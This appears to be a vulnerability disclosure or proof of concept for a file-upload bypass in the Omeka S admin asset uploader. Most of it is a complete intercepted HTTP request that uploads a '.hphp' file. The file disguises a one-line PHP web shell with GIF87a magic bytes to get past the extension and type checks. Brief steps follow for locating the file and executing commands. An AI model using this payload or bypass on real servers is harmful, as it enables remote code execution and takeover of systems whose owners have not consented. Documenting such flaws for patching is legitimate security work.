The upload file function is vulnerable that user can upload the file with other extensions (.php, .phps, …) by using Magic Bytes technique. However, the .htaccess
has almost prevented all the files with extensions such as php, phps, phtml, …
The attacker still can upload the hphp
file and then execute code from a remote machine.
The Apache server which is hosting the web application need to have the ability to execute the hphp
file
Step 1: Login and go to the function that allows uploading, intercept the request, and modify as below
POST /omeka-s/admin/asset/add HTTP/1.1
Host: localhost
Content-Length: 344
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9KHufs2z61gFOMA6
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/omeka-s/admin/asset
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: b8bc1e26ae4f54844a68a1cc98faa75a=lner6c64iimgk1pj70i6ikanpi
Connection: close
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="file"; filename="shell_php.hphp"
Content-Type: application/octet-stream
GIF87a <?php echo system($_REQUEST['cmd']);?>
------WebKitFormBoundary9KHufs2z61gFOMA6
Content-Disposition: form-data; name="o:alt_text"
------WebKitFormBoundary9KHufs2z61gFOMA6--
With the Magic Bytes GIF87a
, the attacker has bypassed the file check, and then he can upload the file (.hphp
) which is not in the whitelist.
Step 2: Check the file path
Step 3: Access the file path and execute commands